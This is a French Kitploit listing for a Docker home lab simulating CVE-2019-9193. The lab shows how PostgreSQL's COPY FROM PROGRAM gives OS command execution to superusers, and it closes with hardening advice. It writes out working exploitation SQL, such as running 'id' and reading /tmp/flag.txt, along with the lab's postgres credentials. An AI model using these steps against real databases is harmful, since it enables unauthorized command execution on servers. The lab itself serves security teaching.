Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-9193-Home-Lab — Ce laboratoire simule la CVE-2019-9193 - RCE PostgreSQL COPY FROM PROGRAM | Kitploit
Outils/GitHubGitHub/netw0rk7/cve-2019-9193-home-lab
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationSécurité des Bases de DonnéesLabs et Pratique
GitHubnetw0rk7/cve-2019-9193-home-lab

CVE-2019-9193-Home-Lab

Ce laboratoire simule la CVE-2019-9193 - RCE PostgreSQL COPY FROM PROGRAM

Voir le dépôt
2il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ANGLAIS CI-DESSOUS

CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

CVE20199193-2

Ce lab simule la vulnérabilité CVE-2019-9193 présente dans PostgreSQL 9.3 - 11.2, qui permet à un utilisateur superuser ou disposant du rôle pg_execute_server_program d'utiliser la commande :

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

pour exécuter directement des commandes OS, entraînant une exécution de commandes à distance (RCE) si un attaquant peut accéder à la base de données.

Ce lab vous permet d'utiliser cette capacité pour lire le fichier :

root@kitploit:~
/tmp/flag.txt

Objectif du lab

  1. Connectez-vous à PostgreSQL avec :
    • Utilisateur : postgres
    • Mot de passe : sentinel7
    • Port : 5433
  2. Utilisez COPY FROM PROGRAM pour exécuter des commandes OS
  • Lisez le flag depuis /tmp/flag.txt

  • Pour commencer

    root@kitploit:~
    docker compose build
    docker compose up -d
    

    Ensuite, connectez-vous à la base de données :

    root@kitploit:~
    psql -U postgres -h 127.0.0.1 -p 5433
    

    Étapes d'exploitation

    1) Créer une table pour stocker la sortie

    root@kitploit:~
    CREATE TABLE cmd_exec(cmd_output text);
    

    2) Tester la RCE avec la commande id

    root@kitploit:~
    COPY cmd_exec FROM PROGRAM 'id';
    SELECT * FROM cmd_exec;
    

    3) Lire le flag

    root@kitploit:~
    TRUNCATE cmd_exec;
    COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
    SELECT * FROM cmd_exec;
    

    Exemple de sortie :

    root@kitploit:~
    flag{SECRET}
    

    Recommandations de sécurité

    • N'utilisez jamais l'utilisateur postgres avec une application de production
    • Limitez les rôles afin qu'ils ne disposent pas de pg_execute_server_program
    • Désactivez ou restreignez l'utilisation de COPY PROGRAM
    • Protégez tous les systèmes contre les injections SQL

    VERSION ANGLAISE

    CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

    Ce lab simule CVE-2019-9193, une vulnérabilité de PostgreSQL 9.3–11.2 permettant :

    root@kitploit:~
    COPY ... FROM PROGRAM '<command>'
    

    d'exécuter des commandes OS lorsqu'elle est utilisée par un superuser ou un rôle disposant de pg_execute_server_program.

    Votre tâche consiste à exploiter cette fonctionnalité pour lire :

    root@kitploit:~
    /tmp/flag.txt
    

    Objectif

    1. Connectez-vous à PostgreSQL :
      • Utilisateur : postgres
      • Mot de passe : sentinel7
      • Port hôte : 5433
    2. Utilisez COPY FROM PROGRAM pour :
      • Exécuter des commandes OS
      • Récupérer le flag

    Pour commencer

    root@kitploit:~
    docker compose build
    docker compose up -d
    

    Connectez-vous via :

    root@kitploit:~
    psql -U postgres -h 127.0.0.1 -p 5433
    

    Exploitation

    1) Créer la table

    root@kitploit:~
    CREATE TABLE cmd_exec(cmd_output text);
    

    2) Tester la RCE

    root@kitploit:~
    COPY cmd_exec FROM PROGRAM 'id';
    SELECT * FROM cmd_exec;
    

    3) Lire le flag

    root@kitploit:~
    TRUNCATE cmd_exec;
    COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
    SELECT * FROM cmd_exec;
    

    Notes de sécurité

    • N'utilisez jamais le superuser PostgreSQL pour exécuter des applications
    • N'accordez pas pg_execute_server_program inutilement
    • Désactivez ou restreignez COPY PROGRAM
    • Durcissez les applications contre l'injection SQL

    Télécharger l’outil